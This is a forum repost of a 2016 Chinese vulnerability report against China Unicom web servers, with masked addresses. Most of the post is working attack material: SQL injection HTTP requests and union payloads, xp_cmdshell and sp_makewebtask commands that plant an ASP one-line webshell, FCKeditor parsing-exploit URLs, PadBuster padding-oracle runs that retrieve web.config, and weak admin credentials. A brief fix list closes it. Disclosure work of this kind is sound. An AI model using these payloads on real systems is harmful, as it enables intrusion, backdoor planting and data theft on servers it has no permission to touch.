HanDs
管理员

[7月漏洞公开] 运营商安全之中国联通多个漏洞打包(手动注入案例) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

一个悲催的漏洞...

详细说明:

#1 SQL注入漏洞

#1.1 证明属于中国联通 http://**.**.**.**/

1-0.png



#1.2 SQL注入位置, 手动注入过程展示

code 区域
POST /zsk/modules/query_chemi.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/zsk/modules/query_chemi.aspx
Cookie: ASP.NET_SessionId=mm3phznvzutfkvpbcfuf5t11
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 688

__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKMTQ5MjMyMjg0MQ9kFgICAw9kFgICAQ9kFhICBw88KwARAgAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnRmZAEQFgAWABYAZAIJDw8WBB4LQ29tbWFuZE5hbWUFATEeB1Zpc2libGVoZGQCCw8PFgQfAgUBMR8DaGRkAg0PDxYEHwIFATIfA2hkZAIPDw8WBB8CBQEwHwNoZGQCEQ8PFgQeBFRleHQFCeesrCAxIOmhtR8DaGRkAhMPDxYEHwQFCeWFsSAwIOmhtR8DaGRkAhUPDxYEHwQFEuaAu%2BWFsSAwIOadoeiusOW9lR8DaGRkAhcPEGQQFQAVABQrAwAWAGQYAQUJR3JpZFZpZXcxDzwrAAwBCGZkr%2Boq2PI%2FFttoRcE4FVUv4XZxwV1K%2B9h0LLmKvkRAHtU%3D&__EVENTVALIDATION=%2FwEWCQL32aavCALw7PDJCALx7PDJCALy7PDJCALz7PDJCAL07PDJCALEhISFCwLdkpmPAQLP%2FqqSD2bBx516y2DQPGYn6nuzTIrt8f2RChkdXX6RV6E7s%2Bp2&ddlSort=1&txtName=1%' and '%'=' &btnOK=%E6%A3%80+%E7%B4%A2



注入点: txtName

Union注入POC:

code 区域
1%'  order by 7-- 确定列数
1%' union select null,db_name(),@@version,system_user,null,host_name(),null-- 获取数据



1-3.png



DBA权限

code 区域
1%' and 1=(select IS_SRVROLEMEMBER('sysadmin'))--



1-2.png



可执行系统命令

code 区域
ipconfig
Windows IP Configuration
Ethernet adapter 本地连接 3:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : **.**.**.**
Subnet Mask . . . . . . . . . . . : **.**.**.**
Default Gateway . . . . . . . . . : **.**.**.**



code 区域
D:\ 的目录

2014-07-18 03:01 <DIR> 9ebaf80b4e53708f8a66ce71606833
2016-01-04 14:07 <DIR> ac
2016-05-28 00:00 <DIR> acbackup
2013-12-16 14:44 125,414,912 ACCT_900.bak
2014-03-31 10:55 141,642,240 He�SalesControlUnicom201R0331.bak
2015-04-01 14:23 35,651,584 HTCIP.mdf
2015-04-01 14:23 86,441,984 HTCIP_1.ldf
2013-11-09 16:25 27,596,288 HTCIP_backup_201308290000.bak
2013-08-29 11:38 5,859,840 lt_pos_lbs.bak
2013-08-29 00:00 1,526,272 Middleware_hbtj_backup_201308290000.bak
2014-03-21 12:_7 <DIR> Sqldata
2014-11-22 09:49 24,205 SQLQuery1联通更新2014.8.11.sql
2014-03-21 10:38 <DIR> Test
2013-08-29 11:38 34R,078,272 UNICOM_LBS.bak
2014-04-02 09:25 702,121,472 UNICOM_LBS_201R0225.bak
2013-11-13 23:01 3,388,858 zjkajtbz.zip
2015-06-30 10:49 <DIR> 数据库备份
2014-11-22 10:05 43,425 权_.sql
12 个文件 1,474,789,352 字节
6 个目录 524,787,335,168 可用字节



##1.3 查找网站目录, 目标是写入一句话后门

首先, 尝试使用SQLMap中的--os-shell, 执行失败, 显示为不支持多语句注入, 手动测试发现是可以的, 先想其他办法吧;

然后, 发现网站存在Fckeditor编辑器, 服务器是IIS6.0, 是否可以解析漏洞写入后门

code 区域
http://**.**.**.**/zsk/fckeditor/editor/dialog/fck_about.html 版本号2.6.3
http://**.**.**.**/zsk/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http%3A%2F%2F**.**.**.**%2Fzsk%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx 获得Fckeditor目录
http://**.**.**.**/zsk/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=%2Fasp.asp&NewFolderName=Test%20Folder 生成.asp的目录并上传jpg文件, 实现目录解析
http://**.**.**.**/zsk/upload/image/asp.asp/wy.jpg
http://**.**.**.**/zsk/upload/image/wy.asp;wy(1).jpg
两者都无法解析, 奇怪了, 我猜测是否是因为服务器禁止脚本执行



但通过Fckeditor爆路径,我们可以获取网站路径

code 区域
http://**.**.**.**/zsk/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/ 暴路径问题
http://**.**.**.**/zsk/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=~/



确定路径位置:

1-4.png



#1.4 手动写入一句话后门

code 区域
两种方式
1%'; exec sp_makewebtask 'D:\ac\wy.txt',' select ''<%execute(request("a"))%>'' ';--
1%'; exec sp_makewebtask 'C:\sjz\zsk\system\wy.txt',' select ''<%execute(request("a"))%>'' ';--

1%'; exec xp_cmdshell 'echo "<%execute(request("value"))%>">>D:\ac\hello.txt';--
1%'; exec xp_cmdshell 'echo "<%execute(request("value"))%>">>C:\sjz\zsk\system\hello.txt';--



结果证明

code 区域
D:\ac 的目录

2016-05-29 20:45 <DIR> .
2016-05-29 20:45 <DIR> ..
2016-05-29 20:45 33 hello.txt
2016-05-29 20:15 408 wy.txt
2014-06-11 15:09 616 [message].txt
2014-06-11 15:09 7,559 张家口数据库修改20140610.sql
2014-01-02 17:04 3,200,082 救援资源Data20140102.zip
2014-06-20 12:31 <DIR> 数据库备份20140620
2014-06-09 15:26 996 新建 文本文档.txt
2014-06-20 11:32 224 查询图片.sql
2014-01-02 19:04 5,481,382 知识.zip
2014-01-02 18:36 10,610 石家庄自查自报数据库修改.sql
2014-03-26 09:52 4,825 脚本.zip
10 个文件 8,706,735 字节
3 个目录 524,785,500,160 可用字节



D盘可以写入, 但C盘网站目录应该禁止写入了, 语句执行失败, 悲剧...

#2 Padding Oracle Attack漏洞

code 区域
padBuster.pl http://**.**.**.**/zsk/WebResource.axd?d=FEPWE03guUt5kpUQHEAucw2 FEPWE03guUt5kpUQHEAucw2 16 -encoding 3 -plaintext "|||~/web.config"



code 区域
+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| labs@**.**.**.** |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 21725

INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 404 2289 N/A
2 ** 255 500 4894 N/A
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (93/256) [Byte 16]
[+] Success: (154/256) [Byte 15]
[+] Success: (150/256) [Byte 14]
[+] Success: (54/256) [Byte 13]
[+] Success: (192/256) [Byte 12]
[+] Success: (207/256) [Byte 11]
[+] Success: (153/256) [Byte 10]
[+] Success: (118/256) [Byte 9]
[+] Success: (71/256) [Byte 8]
[+] Success: (4/256) [Byte 7]
[+] Success: (228/256) [Byte 6]
[+] Success: (246/256) [Byte 5]
[+] Success: (146/256) [Byte 4]
[+] Success: (27/256) [Byte 3]
[+] Success: (78/256) [Byte 2]
[+] Success: (227/256) [Byte 1]

Block 1 Results:
[+] New Cipher Text (HEX): 71c1971d296093d2ac03582ba80003a3
[+] Intermediate Bytes (HEX): 0dbdeb630617f6b082603745ce6964a2

-------------------------------------------------------
** Finished ***

[+] Encrypted value is: ccGXHSlgk9KsA1grqAADowAAAAAAAAAAAAAAAAAAAAA1
-------------------------------------------------------



code 区域
Bruter.pl http://**.**.**.**/zsk/ScriptResource.axd ccGXHSlgk9KsA1grqAADowAAAAAAAAAAAAAAAAAAAAA1 16



code 区域
Total Requests:101

Resulting Exploit Block:WLwionz9NMbfVXcCwv2UuHHBlx0pYJPSrANYK6gAA6MAAAAAAAAAAAAAAAAAAAAA0



code 区域
http://**.**.**.**/zsk/ScriptResource.axd?d=WLwionz9NMbfVXcCwv2UuHHBlx0pYJPSrANYK6gAA6MAAAAAAAAAAAAAAAAAAAAA0



#3 弱密码进入后台

code 区域
http://**.**.**.**/zsk/system/login.aspx admin\123456
http://**.**.**.**/sjzjcxxgl/LoginWXY.aspx admin\admin
http://**.**.**.**/sjzxinxi/SysManage/Login.aspx admin\123456



不截图了, 很容易测试的

漏洞证明:

#1 SQL注入

1-1.png



#2 Padding Oracle Attack

1-5.png

修复方案:

1、Padding Oracle Vulnerability漏洞, 安装微软官方补丁;

2、SQL注入进行过滤, 存在注入的地方很多, 我不列举了, 希望能排除一下;

3、弱密码修改;

4、你们更专业


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
运营
#1楼
发帖时间:2016-7-16   |   查看数:0   |   回复数:0
游客组
快速回复